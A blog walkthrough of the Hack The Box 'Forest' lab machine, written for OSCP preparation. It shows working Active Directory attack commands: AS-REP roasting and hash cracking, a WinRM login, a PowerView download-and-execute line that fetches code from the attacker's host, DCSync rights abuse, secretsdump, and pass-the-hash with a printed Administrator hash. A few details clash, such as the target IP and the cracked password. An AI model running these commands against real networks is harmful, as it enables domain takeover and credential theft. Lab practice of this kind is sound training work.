Hack The Box: Forest Write-up (#42)
16 min readNov 21, 2020
This is my last box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So here is the list of TJ_Null’s OSCP like VMs (those in green colour) that I have been working on.
So let’s begin.
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomater 10.10.10.74 All- All: Runs all the scans consecutively (~20–30 minutes)
We get the back the following result:
Running all scans on 10.10.10.161
Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:39 +08
Nmap scan report for 10.10.10.161
Host is up (0.014s latency).
Not shown: 989 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPsslNmap done: 1 IP address (1 host up) scanned in 0.66 seconds---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:39 +08
Nmap scan report for 10.10.10.161
Host is up (0.012s latency).PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-13 18:46:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/14%Time=5F5E6771%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2h26m50s, deviation: 4h02m29s, median: 6m49s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-09-13T11:48:47-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-09-13T18:48:49
|_ start_date: 2020-09-13T02:34:56Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 276.71 seconds----------------------Starting Nmap UDP Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:44 +08
Warning: 10.10.10.161 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.161
Host is up (0.0085s latency).
Not shown: 976 open|filtered ports, 21 closed ports
PORT STATE SERVICE
123/udp open ntp
389/udp open ldap
57958/udp open unknownNmap done: 1 IP address (1 host up) scanned in 19.85 secondsMaking a script scan on UDP ports: 123, 389, 57958
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:44 +08
Nmap scan report for 10.10.10.161
Host is up (0.0096s latency).PORT STATE SERVICE VERSION
123/udp open ntp NTP v3
389/udp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
57958/udp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| NBTStat:
|_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port57958-UDP:V=7.80%I=7%D=9/14%Time=5F5E68A4%P=x86_64-pc-linux-gnu%r(N
SF:BTStat,32,"\x80\xf0\x80\x82\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAA
SF:AAAAAAAAAA\0\0!\0\x01");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.77 seconds---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:44 +08
Initiating Parallel DNS resolution of 1 host. at 02:44
Completed Parallel DNS resolution of 1 host. at 02:44, 0.01s elapsed
Initiating SYN Stealth Scan at 02:44
Scanning 10.10.10.161 [65535 ports]
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
SYN Stealth Scan Timing: About 23.34% done; ETC: 02:47 (0:01:42 remaining)
Discovered open port 49703/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
SYN Stealth Scan Timing: About 46.22% done; ETC: 02:47 (0:01:11 remaining)
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
SYN Stealth Scan Timing: About 69.06% done; ETC: 02:47 (0:00:41 remaining)
Discovered open port 49671/tcp on 10.10.10.161
Discovered open port 49958/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 49669/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Completed SYN Stealth Scan at 02:47, 131.44s elapsed (65535 total ports)
Nmap scan report for 10.10.10.161
Host is up (0.0078s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49684/tcp open unknown
49703/tcp open unknown
49958/tcp open unknownRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 131.53 seconds
Raw packets sent: 65714 (2.891MB) | Rcvd: 65650 (2.626MB)Making a script scan on extra ports: 5985, 9389, 47001, 49664, 49665, 49666, 49669, 49671, 49676, 49677, 49684, 49703, 49958
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:47 +08
Nmap scan report for 10.10.10.161
Host is up (0.011s latency).PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49958/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.86 seconds---------------------Starting Nmap Vulns Scan---------------------
Running CVE scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:48 +08
Nmap scan report for 10.10.10.161
Host is up (0.010s latency).PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-13 18:54:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49958/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/14%Time=5F5E696C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.35 secondsRunning Vuln scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 02:50 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.161
Host is up (0.010s latency).PORT STATE SERVICE VERSION
53/tcp open domain?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-09-13 18:57:54Z)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
464/tcp open kpasswd5?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
636/tcp open tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
3269/tcp open tcpwrapped
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49665/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49666/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49669/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49671/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49677/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49684/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49703/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49958/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/14%Time=5F5E6A1E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIEDService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 371.74 seconds
We have 24 ports open.
- Port 53, 49202, 49211 and 62154: — Running DNS
- Port 88: — Running Microsoft Windows Kerberos
- Port 139 and 445: — Running SMB
- Port 389 and 3268: — Running Microsoft Windows Active Directory LDAP
- Port 464: — Running kpasswd5
- Port 593 and 49676: — Running ncacn_http
- Port 637 and 3269: — Running tcpwrapped
- Port 5985: — Running wsman
- Port 47001: — Running winrm
- Port 9389: — Running .Net Message Framing
- Ports 135, 49664, 49665, 49666, 49667, 49671, 49677, 49684, 49706, 49900: — Running Windows Microsoft RPC.
- Port 123: Running NTP
Before we move to the enumeration phase, let’s make quick mental notes about the scan results.
- Since Kerberos and LDAP services are running, chances are we’re dealing with a Windows Active Directory Box.
- The Nmap scan leaks domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS Nmap scan leaks the operation system: Windows Server 2016 Standard 14393.
- Port 389 is running LDAP. We’ll need to query it for any useful information. Same goes for SMB.
- The WSMan and WinRM services are open. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box.
Service Enumeration
We’ll start with enumeration LDAP.
Port 389 (LDAP)
Let’s use ldapsearch tool to find any useful information on port 389.
ldapsearch -x -h 10.10.10.161 -s base namingContextsWe get back the following results.
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts
##
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local# search result
search: 2
result: 0 Success# numResponses: 2
# numEntries: 1
We have namingContext info. Next, run another command enumerate object class person.
ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local" '(objectClass=Person)' | grep givenNameWe get back the following results.
givenName: Sebastien
givenName: Lucinda
givenName: Andy
givenName: Mark
givenName: SantiWe have five usernames. Save these names in our Kali Linux we might be required to brute force credentials.
Port 139 & 445 (SMB)
We’ll run enum4linux which is a tool for enumerating information from Windows and Samba systems. It’s a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. With special configuration, you can even have it query LDAP.
enum4linux 10.10.10.161 > enum4linux-results.txtWe get a list of domain users.
...
Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group 'Domain Users' (RID: 513) has member: HTB\sebastien
Group 'Domain Users' (RID: 513) has member: HTB\lucinda
Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group 'Domain Users' (RID: 513) has member: HTB\andy
Group 'Domain Users' (RID: 513) has member: HTB\mark
Group 'Domain Users' (RID: 513) has member: HTB\santi
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
...We have additional username svc-alfresco add this name in the username list. Now I have a bunch of usernames but no passwords. If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers impacket script to send a dummy request for authentication. The Key Distribution Centre (KDC) will then return a Ticket Granting Ticket (TGT) that is encrypted with the user’s password. From there, we can take the encrypted TGT, run it through John or Hashcat to crack the password.
Run the following command with TGT output format in John.
GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request -format johnWe get back the following results.
It seems Kerberos pre-authentication option disabled for user svc-alfresco and the KDC gave us back a TGT encrypted with the user’s password.
Save the encrypted TGT in the file tgthash.txt.
root@kali:/htb/Forest# cat tgthash.txt
$krb5asrep$svc-alfresco@HTB.LOCAL:42390a998bc2827292fe7f51fb42dcd0$d9ea23e45e65a415bb838b64adf60d0a108ab14152fadccc87d413b32a79261c9fcbdc327451afb7e36412130cfdbcb6f087fbd3f885f4b59923a1d314a77e6c3feadf8d6e41de479fdb190e5a9cc9b02ca560f5c48427d1df907275b9bec5d07dca2c18f306e18df921beb913c5b892b0ee1d0058014d3a7be543a731ed8210d3b1afd19dda9fea40e123d8847b2df57e923c129beb3903a60ee2968807f58585bacaab283db536c89799aac347a1c0abf3469de038647b551285e3cda1078870d62dcc257e97130d53cf77f3679c1b3b3ec32a9fca6be2d8fc307ea0d16c4f84ee78ec7c8dCrack the password using John the Ripper.
john --wordlist=/usr/share/wordlists/rockyou.txt tgthash.txtJohn successfully cracked the password.
root@kali:/htb/Forest# john --show tgthash.txt
$krb5asrep$svc-alfresco@HTB.LOCAL:s3rvice1 password hash cracked, 0 left
Exploitation
Now that we have the username/password svc-alfresco/s3rvice, we’ll use the Evil-WinRM script to gain an initial foothold on the box. This is only possible because the WinRM and WSMan services are open (refer to Nmap scan).
evil-winrm -i 10.10.10.161 -u svc-alfresco -p 's3rvice'We get a shell!
Grab the user.txt flag.
Privilege Escalation
Enumerate the users on the domain.
Check the user privilege.
Enumerate the user account we are running as.
The user is part of the “Service Account” group. Let’s run bloodhound to see if there are any exploitable paths.
First, download SharpHound.exe and set up an SMB share in the directory it resides in.
python /usr/share/doc/python3-impacket/examples/smbserver.py tools .In the target machine, copy the executable.
copy \\10.10.14.31\tools\SharpHound.exe .Then run the program.
./SharpHound.exeThis outputs two files.
We need to transfer the ZIP file to our Kali Linux machine. To do that, base64 encode the file.
certutil -encode 20200913135554_BloodHound.zip encoded.txtThen output the base64 encoded file.
type encoded.txtCopy it and base64 decode it on the Kali Linux machine.
echo -n <base64 encode strings> |base64 -d > bloodhound-result.zipNow that we have the zipped file on our Kali Linux machine, we need to upload it to BloodHound. If you don’t have BloodHound install on your computer, use the following command to install it.
apt install bloodhoundNext, we need to start up the neo4j database.
neo4j consoleThen run bloodhound.
bloodhoundDrag and stop the zipped file into BloodHound. Then set the start node to be the svc-alfresco user.
Right-click on the user and select “Mark User as Owned”.
In the Queries tab, select the pre-build query “Shortest Path from Owned Principles”.
We get back the following result.
From the above figure, we can see that svc-alfresco is a member of Service Accounts which is a member of Privilege IT Accounts, which is a member of Account Operators. Moreover, the Account Operators group has GenericAll permissions on the Exchange Windows Permission group, which has WriteDacl permissions on the domain.
Let’s break it down.
- svc-alfresco is not just a member of Service Accounts but is also a member of groups Privilege IT Accounts and Account Operators.
- The Account Operators group grants limited account creation privilege to a user. Therefore, the user svc-alfresco can create other users on the domain.
- The Account Operators group has GenericAll permission on the Exchange Windows Permissions group. This permission essentially gives members full control of the group and therefore allows members to directly modify group membership. Since svc-alfresco is a member of Account Operators, he is able to modify the permission of the Exchange Windows Permissions group.
- The Exchange Windows Permissions group has WriteDacl permission on the domain HTB.LOCAL. This permission allows members to modify the DACL (Discretionary Access Control List) on the domain. We’ll abuse this to grant ourselves DcSync privileges, which will give us the right to perform domain replication and dump all the password hashes from the domain.
Putting all the pieces together, the following is our attack path.
- Create a user on the domain. This is possible because svc-alfresco is a member of the Account Operators.
- Add the user to the Exchange Windows Permissions group. This is possible because svc-alfresco has GenericAll permissions on the Exchange Windows Permissions group.
- Give the user DCSync privileges. This is possible because the user is a part of the Exchange Windows Permissions group which has WriteDacl permission on the htb.local domain.
- Perform a DCSync attack and dump the password hashes of all the users on the domain.
- Perform a Pass the Hash attack to get access to the administrator’s account.
Alright, let’s get started.
Create a user on the domain.
net user joshua password /add /domainConfirm the user has created.
Add the user to the Exchange Windows Permissions group.
net group "Exchange Windows Permissions" /add joshuaConfirm the user was added to the group.
Give the user DCSync Privileges. We’ll use PowerView for this. First download PowerView and setup a python server in the directory it resides in.
python3 -m http.server 80Then download the script in the target machine.
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/PowerView.ps1')Use the Add-DomainObjectAcl function in PowerView to give the user DCSync privileges.
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force$cred = New-Object System.Management.Automation.PSCredential('htb\joshua', $pass)Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity joshua -Rights DCSync
On the Kali Linux, use the secretdump Impacket script to dump the password hashes of all the users on the domain.
impacket-secretsdump htb.local/joshua:password@10.10.10.161We get back the following result.
Use the pth-winexe to perform a pass the hash attack with the Administrator’s hash.
pth-winexe --system -U htb/administrator%aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 //10.10.10.161 cmd.exeWe get a shell!
Grab the root.txt flag.
Attack Strategy Map
I have summarized the entire attack strategy on this map.
Thank you for reading :-). I will plan to do something new in the future write-ups. Probably I will do write-ups for TryHackMe challenges.
